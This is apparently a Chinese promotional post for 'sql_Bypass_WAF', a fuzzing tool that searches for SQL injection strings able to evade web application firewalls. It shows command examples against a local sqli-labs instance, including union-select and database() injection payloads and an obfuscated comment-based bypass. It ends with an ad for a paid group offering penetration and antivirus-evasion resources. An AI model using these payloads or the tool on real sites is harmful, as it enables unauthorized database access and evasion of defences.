0x01 工具介绍
0x01 工具介绍
sql_Bypass_WAF是一款sql注入绕waf工具,通过fuzz的方式,进行大量测试找到bypass语句。
0x02 安装与使用
1、-h查看参数帮助
2、先判断出waf拦截的sql恶意语句。
3、再将想要Bypass的语句带入到工具中,注意带入到工具中的url为waf拦截的url。
如果bypass一个参数,用"~"进行包裹,如
http://192.168.170.133/sqli/less-1/?id=1' and 1=1 --+
将"and"用~包裹后:
http://192.168.170.133/sqli/less-1/?id=1' ~and~ 1=1 --+
命令示例:
sql_Bypass_WAF.exe -s "http://192.168.170.133/sqli/less-1/?id=1' ~and~ 1=1 --+"
如果为两个参数,在两个参数中间加"^",如
http://192.168.170.133/sqli/less-1/?id=1' order by 1 --+
将"order by"用^指定
http://192.168.170.133/sqli/less-1/?id=1' order^by 1 --+
命令示例:
sql_Bypass_WAF.exe -s "http://192.168.170.133/sqli/less-1/?id=1' order^by 1 --+"
暂不支持超过两个参数的fuzz,但可以拆分依次带入测试,如:
测试语句:
http://192.168.170.133/sqli/less-1/?id=-1' union select 1,database(),3 --+
先bypass"union select"
http://192.168.170.133/sqli/less-1/?id=-1' union^select 1,2,3 --+
bypass后语句:
http://192.168.170.133/sqli/less-1/?id=-1' union/*////%//select 1,2,3 --+
再bypass"database()"
http://192.168.170.133/sqli/less-1/?id=-1' union/*////%//select 1,database^(),3 --+
翻到文章最底部点击“阅读原文”下载链接
★
欢 迎 加 入 星 球 !
代码审计+免杀+渗透学习资源+各种资料文档+各种工具+付费会员
进成员内部群
星球的最近主题和星球内部工具一些展示
关 注 有 礼
还在等什么?赶紧点击下方名片关注学习吧!
推荐阅读